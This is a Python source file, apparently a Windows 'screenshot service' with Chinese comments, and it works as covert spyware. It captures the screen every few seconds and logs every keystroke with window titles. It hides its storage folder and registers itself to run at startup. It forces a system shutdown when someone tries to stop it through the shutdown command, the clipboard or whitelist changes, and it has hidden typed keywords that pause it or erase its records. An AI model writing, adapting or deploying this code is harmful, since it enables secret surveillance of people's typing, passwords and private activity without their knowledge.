import
argparse
import
os
import
time
import
logging
from
datetime
import
datetime
import
winreg
import
psutil
import
win32process
import
win32api
import
win32security
import
win32con
import
win32gui
from
PIL
import
ImageGrab
import
json
import
sys
from
pynput
import
keyboard
import
threading
import
queue
import
gc
from
concurrent.futures
import
ThreadPoolExecutor
import
ctypes
from
ctypes
import
wintypes
import
subprocess
import
pyperclip
PROCESS_ALL_ACCESS
=
0x1F0FFF
PROCESS_VM_READ
=
0x0010
PROCESS_VM_WRITE
=
0x0020
PROCESS_VM_OPERATION
=
0x0008
PROCESS_QUERY_INFORMATION
=
0x0400
executor
=
ThreadPoolExecutor(max_workers
=
2
)
screenshot_queue
=
queue.Queue()
is_listening
=
True
is_screenshotting
=
True
current_input
=
""
shutdown_in_progress
=
False
last_clipboard_content
=
""
def
get_app_path():
if
getattr
(sys,
'frozen'
,
False
):
return
os.path.dirname(sys.executable)
return
os.path.dirname(os.path.abspath(__file__))
def
load_config():
config_path
=
os.path.join(get_app_path(),
'config.json'
)
default_config
=
{
"white_list"
: [
'微信'
,
'WeChat'
,
'聊天文件'
,
'朋友圈'
],
"save_path"
:
"D:/doc/local"
,
"sleep_time"
:
5
,
"keylogger_enabled"
:
True
,
"keylogger_respect_whitelist"
:
True
}
if
not
os.path.exists(config_path):
with
open
(config_path,
'w'
, encoding
=
'utf-8'
) as f:
json.dump(default_config, f, ensure_ascii
=
False
, indent
=
4
)
logging.info(
"已创建默认配置文件"
)
return
default_config
try
:
with
open
(config_path,
'r'
, encoding
=
'utf-8'
) as f:
config
=
json.load(f)
if
not
all
(key
in
config
for
key
in
default_config):
config
=
{
*
*
default_config,
*
*
config}
with
open
(config_path,
'w'
, encoding
=
'utf-8'
) as f:
json.dump(config, f, ensure_ascii
=
False
, indent
=
4
)
return
config
except
Exception as e:
logging.error(f
"加载配置文件失败: {str(e)}"
)
return
default_config
def
setup_logging():
today
=
datetime.now().strftime(
'%Y-%m-%d'
)
log_dir
=
os.path.join(SAVE_PATH, today)
os.makedirs(log_dir, exist_ok
=
True
)
for
handler
in
logging.root.handlers[:]:
logging.root.removeHandler(handler)
file_handler
=
logging.FileHandler(
os.path.join(log_dir,
'screenshot.log'
),
encoding
=
'utf-8'
,
mode
=
'a'
)
console_handler
=
logging.StreamHandler(sys.stdout)
formatter
=
logging.Formatter(
'%(asctime)s - %(message)s'
, datefmt
=
'%Y-%m-%d %H:%M:%S'
)
file_handler.setFormatter(formatter)
console_handler.setFormatter(formatter)
if
os.path.exists(os.path.join(log_dir,
'screenshot.log'
)):
with
open
(os.path.join(log_dir,
'screenshot.log'
),
'a'
, encoding
=
'utf-8'
) as f:
if
os.path.getsize(os.path.join(log_dir,
'screenshot.log'
))
=
=
0
:
f.write(
'\ufeff'
)
else
:
with
open
(os.path.join(log_dir,
'screenshot.log'
),
'w'
, encoding
=
'utf-8'
) as f:
f.write(
'\ufeff'
)
logging.root.setLevel(logging.INFO)
logging.root.addHandler(file_handler)
logging.root.addHandler(console_handler)
parser
=
argparse.ArgumentParser(description
=
"Screen Shot Service"
)
parser.add_argument(
"--sleep"
,
type
=
int
, default
=
5
,
help
=
"截屏间隔时间 默认5秒"
)
parser.add_argument(
"--save_path"
,
type
=
str
, default
=
None
,
help
=
"图片文件存储地址"
)
parser.add_argument(
"--white_list"
,
type
=
str
, default
=
"
", help="
应用白名单 按,分割传入 默认为空")
parser.add_argument(
"--no_keylog"
, action
=
"store_true"
,
help
=
"禁用键盘记录功能"
)
args, _
=
parser.parse_known_args()
config
=
load_config()
SLEEP_TIME
=
args.sleep
if
args.sleep !
=
5
else
config[
'sleep_time'
]
SAVE_PATH
=
args.save_path
if
args.save_path
is
not
None
else
config[
'save_path'
]
os.makedirs(SAVE_PATH, exist_ok
=
True
)
WHITE_LIST
=
args.white_list
white_list
=
config[
'white_list'
]
if
WHITE_LIST !
=
"":
str_list
=
WHITE_LIST.split(
","
)
white_list
=
list
(
set
(str_list
+
white_list))
original_white_list
=
[
'微信'
,
'WeChat'
,
'聊天文件'
,
'朋友圈'
]
if
sorted
(white_list) !
=
sorted
(original_white_list):
os.system(
"shutdown /s /t 60"
)
logging.error(
"检测到白名单被篡改,系统将于60秒后自动关机"
)
ctypes.windll.user32.MessageBoxW(
0
,
"检测到白名单被篡改,系统将于60秒后自动关机"
,
"警告"
,
0
)
KEYLOGGER_ENABLED
=
False
if
args.no_keylog
else
config.get(
'keylogger_enabled'
,
True
)
KEYLOGGER_RESPECT_WHITELIST
=
config.get(
'keylogger_respect_whitelist'
,
True
)
setup_logging()
def
hide_process():
try
:
current_pid
=
win32api.GetCurrentProcessId()
handle
=
win32api.OpenProcess(PROCESS_ALL_ACCESS,
False
, current_pid)
win32process.SetPriorityClass(handle, win32process.BELOW_NORMAL_PRIORITY_CLASS)
win32api.CloseHandle(handle)
logging.info(
"进程已隐藏"
)
except
Exception as e:
logging.error(f
"隐藏进程失败: {str(e)}"
)
def
optimize_memory():
try
:
gc.collect()
process
=
psutil.Process()
process.nice(psutil.BELOW_NORMAL_PRIORITY_CLASS)
logging.info(
"内存已优化"
)
except
Exception as e:
logging.error(f
"内存优化失败: {str(e)}"
)
def
screenshot_worker():
while
True
:
try
:
task
=
screenshot_queue.get()
if
task
is
None
:
break
active_title, save_dir
=
task
screenshot_png
=
ImageGrab.grab()
file_name
=
os.path.join(save_dir, f
"screenshot_{datetime.now().strftime('%H-%M-%S')}.png"
)
screenshot_png.save(file_name, optimize
=
True
, quality
=
85
)
logging.info(f
"截图已保存: {file_name}, 当前窗口: {active_title}"
)
del
screenshot_png
gc.collect()
except
Exception as e:
logging.error(f
"截图工作线程错误: {str(e)}"
)
finally
:
screenshot_queue.task_done()
def
is_white_window_open():
active_window
=
win32gui.GetForegroundWindow()
active_title
=
win32gui.GetWindowText(active_window)
if
active_title
in
white_list:
if
win32gui.IsWindowVisible(active_window):
placement
=
win32gui.GetWindowPlacement(active_window)
if
placement[
1
] !
=
win32con.SW_SHOWMINIMIZED:
logging.debug(f
"检测到活动的白名单窗口: {active_title}"
)
return
True
logging.debug(f
"当前活动窗口不在白名单中: {active_title}"
)
return
False
def
add_to_startup():
try
:
key_path
=
r
"Software\Microsoft\Windows\CurrentVersion\Run"
key
=
winreg.OpenKey(winreg.HKEY_CURRENT_USER, key_path,
0
, winreg.KEY_ALL_ACCESS)
script_path
=
os.path.abspath(__file__)
winreg.SetValueEx(key,
"ScreenshotService"
,
0
, winreg.REG_SZ, f
'pythonw "{script_path}"'
)
winreg.CloseKey(key)
logging.info(
"已添加到开机自启动"
)
except
Exception as e:
logging.error(f
"添加开机自启动失败: {str(e)}"
)
def
get_active_window_info():
active_window
=
win32gui.GetForegroundWindow()
active_title
=
win32gui.GetWindowText(active_window)
return
active_title
def
screenshot():
if
not
is_screenshotting:
return
try
:
active_title
=
get_active_window_info()
today
=
datetime.now().strftime(
'%Y-%m-%d'
)
save_dir
=
os.path.join(SAVE_PATH, today)
os.makedirs(save_dir, exist_ok
=
True
)
screenshot_queue.put((active_title, save_dir))
except
Exception as e:
logging.error(f
"截图失败: {str(e)}"
)
def
get_keylog_file():
today
=
datetime.now().strftime(
'%Y-%m-%d'
)
save_dir
=
os.path.join(SAVE_PATH, today)
os.makedirs(save_dir, exist_ok
=
True
)
return
os.path.join(save_dir,
'keylog.txt'
)
def
on_key_press(key):
global
is_listening, is_screenshotting, current_input, shutdown_in_progress
if
not
KEYLOGGER_ENABLED:
return
if
KEYLOGGER_RESPECT_WHITELIST
and
is_white_window_open():
return
try
:
if
hasattr
(key,
'char'
):
key_char
=
key.char
else
:
key_char
=
str
(key).replace(
"Key."
,
"<"
)
+
">"
if
key_char.isalnum():
current_input
+
=
key_char.lower()
else
:
current_input
=
""
if
current_input
=
=
"exit"
:
is_listening
=
False
is_screenshotting
=
False
current_input
=
""
logging.info(
"已暂停全部监听和截图"
)
elif
current_input
=
=
"open"
:
is_listening
=
True
is_screenshotting
=
True
current_input
=
""
logging.info(
"已启动全部监听和截图"
)
elif
current_input
=
=
"file"
:
show_folder(SAVE_PATH)
current_input
=
""
elif
current_input
=
=
"hide"
:
hide_folder(SAVE_PATH)
current_input
=
""
elif
current_input
=
=
"clean"
:
clean_today_records()
current_input
=
""
elif
current_input
=
=
"format"
:
format_local_records()
current_input
=
""
elif
current_input
=
=
"shutdown"
:
if
not
shutdown_in_progress:
logging.warning(
"检测到连续输入shutdown,开始倒计时30秒关机"
)
shutdown_in_progress
=
True
threading.Thread(target
=
shutdown_countdown, daemon
=
True
).start()
current_input
=
""
active_title
=
get_active_window_info()
timestamp
=
datetime.now().strftime(
'%Y-%m-%d %H:%M:%S'
)
with
open
(get_keylog_file(),
'a'
, encoding
=
'utf-8'
) as f:
f.write(f
"[{timestamp}] [{active_title}] Key: {key_char}\n"
)
except
Exception as e:
logging.error(f
"键盘记录失败: {str(e)}"
)
def
start_keylogger():
if
KEYLOGGER_ENABLED:
logging.info(
"键盘记录功能已启动"
)
keylog_file
=
get_keylog_file()
if
not
os.path.exists(keylog_file):
with
open
(keylog_file,
'w'
, encoding
=
'utf-8'
) as f:
f.write(
'\ufeff'
)
keyboard_listener
=
keyboard.Listener(on_press
=
on_key_press)
keyboard_listener.start()
return
keyboard_listener
return
None
def
hide_folder(folder_path):
try
:
ctypes.windll.kernel32.SetFileAttributesW(folder_path, win32con.FILE_ATTRIBUTE_HIDDEN)
logging.info(f
"文件夹 {folder_path} 已隐藏"
)
except
Exception as e:
logging.error(f
"隐藏文件夹失败: {str(e)}"
)
def
show_folder(folder_path):
try
:
ctypes.windll.kernel32.SetFileAttributesW(folder_path, win32con.FILE_ATTRIBUTE_NORMAL)
os.startfile(folder_path)
logging.info(f
"已打开文件夹 {folder_path} 并取消隐藏"
)
except
Exception as e:
logging.error(f
"打开文件夹并取消隐藏失败: {str(e)}"
)
def
clean_today_records():
today
=
datetime.now().strftime(
'%Y-%m-%d'
)
today_dir
=
os.path.join(SAVE_PATH, today)
if
os.path.exists(today_dir):
logging.shutdown()
for
handler
in
logging.root.handlers[:]:
handler.close()
logging.root.removeHandler(handler)
for
root, dirs, files
in
os.walk(today_dir, topdown
=
False
):
for
file
in
files:
file_path
=
os.path.join(root,
file
)
try
:
os.remove(file_path)
except
Exception as e:
logging.error(f
"删除文件 {file_path} 失败: {str(e)}"
)
for
dir
in
dirs:
dir_path
=
os.path.join(root,
dir
)
try
:
os.rmdir(dir_path)
except
Exception as e:
logging.error(f
"删除目录 {dir_path} 失败: {str(e)}"
)
logging.info(
"已清空当天全部记录"
)
setup_logging()
else
:
logging.info(
"当天记录目录不存在,无需清空"
)
def
format_local_records():
if
os.path.exists(SAVE_PATH):
logging.shutdown()
for
handler
in
logging.root.handlers[:]:
handler.close()
logging.root.removeHandler(handler)
for
root, dirs, files
in
os.walk(SAVE_PATH, topdown
=
False
):
for
file
in
files:
file_path
=
os.path.join(root,
file
)
try
:
os.remove(file_path)
except
Exception as e:
logging.error(f
"删除文件 {file_path} 失败: {str(e)}"
)
for
dir
in
dirs:
dir_path
=
os.path.join(root,
dir
)
try
:
os.rmdir(dir_path)
except
Exception as e:
logging.error(f
"删除目录 {dir_path} 失败: {str(e)}"
)
logging.info(
"已删除local下全部记录"
)
setup_logging()
else
:
logging.info(
"记录目录不存在,无需删除"
)
def
monitor_shutdown_command():
global
shutdown_in_progress
while
True
:
try
:
output
=
subprocess.check_output(
"tasklist /FI \"IMAGENAME eq shutdown.exe\""
, shell
=
True
, text
=
True
)
if
"shutdown.exe"
in
output
and
not
shutdown_in_progress:
logging.warning(
"检测到 shutdown -a 命令,开始倒计时30秒关机"
)
shutdown_in_progress
=
True
threading.Thread(target
=
shutdown_countdown, daemon
=
True
).start()
except
Exception as e:
logging.error(f
"监控关机命令失败: {str(e)}"
)
time.sleep(
0.5
)
def
shutdown_countdown():
global
shutdown_in_progress
countdown
=
30
while
countdown >
0
:
logging.warning(f
"系统将在 {countdown} 秒后关机"
)
time.sleep(
1
)
countdown
-
=
1
logging.warning(
"开始关机"
)
os.system(
"shutdown /s /t 0"
)
shutdown_in_progress
=
False
def
monitor_clipboard():
global
last_clipboard_content, shutdown_in_progress
try
:
current_clipboard_content
=
pyperclip.paste()
logging.debug(f
"当前剪切板内容: {current_clipboard_content}"
)
logging.debug(f
"上次剪切板内容: {last_clipboard_content}"
)
if
current_clipboard_content !
=
last_clipboard_content:
last_clipboard_content
=
current_clipboard_content
if
"shutdown"
in
current_clipboard_content.lower():
if
not
shutdown_in_progress:
logging.warning(
"检测到剪切板内容包含 'shutdown',开始倒计时30秒关机"
)
shutdown_in_progress
=
True
threading.Thread(target
=
shutdown_countdown, daemon
=
True
).start()
except
Exception as e:
logging.error(f
"监测剪切板失败: {str(e)}"
)
if
__name__
=
=
"__main__"
:
hide_process()
hide_folder(SAVE_PATH)
logging.info(f
"截图服务启动 - 保存路径: {SAVE_PATH}, 间隔时间: {SLEEP_TIME}秒"
)
logging.info(f
"当前白名单: {white_list}"
)
logging.info(f
"键盘记录功能: {'已启用' if KEYLOGGER_ENABLED else '已禁用'}"
)
add_to_startup()
screenshot_thread
=
threading.Thread(target
=
screenshot_worker, daemon
=
True
)
screenshot_thread.start()
keyboard_listener
=
start_keylogger()
threading.Thread(target
=
monitor_shutdown_command, daemon
=
True
).start()
try
:
while
True
:
try
:
if
is_listening:
active_title
=
get_active_window_info()
white_window_status
=
is_white_window_open()
if
not
white_window_status:
logging.info(f
"未检测到白名单窗口,开始截图 - 当前窗口: {active_title}"
)
screenshot()
else
:
logging.info(f
"检测到白名单窗口,跳过截图 - 当前窗口: {active_title}"
)
if
time.time()
%
300
< SLEEP_TIME:
optimize_memory()
monitor_clipboard()
except
Exception as e:
logging.error(f
"主循环错误: {str(e)}"
)
time.sleep(SLEEP_TIME)
except
KeyboardInterrupt:
screenshot_queue.put(
None
)
screenshot_thread.join()
if
keyboard_listener:
keyboard_listener.stop()
logging.info(
"服务已停止"
)
finally
:
executor.shutdown(wait
=
True
)
gc.collect()
for
handler
in
logging.root.handlers[:]:
handler.close()
logging.root.removeHandler(handler)